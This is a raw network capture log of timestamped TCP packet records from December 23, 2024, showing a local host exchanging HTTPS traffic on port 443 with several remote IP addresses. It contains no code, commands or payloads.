                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933479071 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933618069 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934004068 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934066057 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934436083 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934451103 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934731007 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934741020 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936815977 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936827898 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936978102 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936995983 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937064886 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937076092 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937089920 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937102079 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.951652050 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.951679945 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533058882 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533097029 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533296108 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533689976 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533708096 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416817904 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416878939 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416894913 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416997910 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417000055 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417263985 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417736053 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417748928 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.550884962 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.550961971 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551211119 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551536083 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551565886 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.934570074 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.934628963 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.935050011 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.935062885 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.936949968 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.936956882 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937078953 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937096119 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937176943 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937199116 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937315941 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937347889 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937453032 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937479019 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937499046 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937525034 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937541962 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.937551022 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.959616899 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.959750891 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.960362911 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.960371017 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.962106943 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:08.962111950 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:09.736767054 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:09.736829042 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:09.736917973 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:09.739074945 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:09.739093065 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027203083 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027267933 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027293921 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027348995 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027409077 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.027460098 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.028249979 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:10.028265953 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327692986 CET49900443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327730894 CET44349900172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327832937 CET49900443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328310013 CET49900443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328324080 CET44349900172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328778982 CET49901443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328876019 CET44349901142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328954935 CET49901443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329102039 CET49902443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329111099 CET44349902172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329179049 CET49902443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329340935 CET49902443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329354048 CET44349902172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329468012 CET49901443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.329499006 CET44349901142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.357800961 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.357825994 CET44349904162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.357976913 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.358751059 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.358764887 CET44349904162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.487548113 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.487595081 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.487660885 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.494457006 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.494472027 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.047517061 CET49916443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.047570944 CET44349916162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.047643900 CET49916443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.047933102 CET49916443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.047970057 CET44349916162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.092822075 CET49917443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.092865944 CET44349917172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.092941046 CET49917443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.098078966 CET49917443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.098109961 CET44349917172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.189996004 CET49918443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.190023899 CET44349918172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.190167904 CET49918443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.190366030 CET49918443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.190373898 CET44349918172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.245409012 CET49900443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.245539904 CET49917443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246020079 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246042013 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246124029 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246248007 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246267080 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246373892 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246607065 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246619940 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246745110 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.246767044 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.247905970 CET49902443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.247944117 CET49918443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.248313904 CET49901443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.249361992 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.249381065 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.249444008 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.250916958 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.250933886 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.251048088 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.251065016 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.251080990 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.251238108 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.252726078 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.252752066 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.252876997 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.252970934 CET49916443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253410101 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253418922 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253473997 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253612041 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253621101 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.253670931 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.254149914 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.254162073 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.254244089 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.254256010 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.255069017 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.255076885 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.255084991 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.255109072 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.291337013 CET44349917172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.291341066 CET44349900172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.295329094 CET44349918172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.295344114 CET44349901142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.295348883 CET44349902172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.299331903 CET44349916162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.299335957 CET44349904162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.386295080 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.386317015 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.386549950 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.387224913 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.387245893 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.540854931 CET44349900172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.540927887 CET49900443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.544270039 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.544370890 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.544447899 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.544650078 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.544687033 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.551161051 CET44349902172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.551229000 CET49902443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.567791939 CET44349904162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.567890882 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.567898989 CET44349904162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.567981958 CET49904443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.911142111 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.911284924 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.911824942 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.911830902 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.914208889 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.914212942 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.914294004 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.914299965 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.213668108 CET44349901142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.213746071 CET49901443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.272046089 CET44349916162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.272119045 CET49916443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.301594019 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.301647902 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.301711082 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.301918983 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.301934004 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.305826902 CET44349917172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.305907011 CET49917443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.360877991 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.360901117 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.360965967 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.361154079 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.361166954 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.413130045 CET44349918172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.413197041 CET49918443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.423645973 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.423696995 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.423784018 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.424037933 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.424063921 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.470077038 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.470408916 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.470422029 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.471760035 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.471847057 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.473031998 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.473261118 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.473412037 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474209070 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474288940 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474401951 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474416971 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474514008 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474530935 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474539042 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474554062 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474719048 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474741936 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474833965 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.474860907 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475399971 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475465059 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475631952 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475704908 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475742102 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475792885 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475814104 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.475852966 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476219893 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476224899 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476457119 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476515055 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476656914 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476721048 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.476764917 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477107048 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477190018 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477282047 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477345943 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477413893 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477493048 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477500916 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477565050 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477579117 CET44349937162.159.61.3192.168.2.5
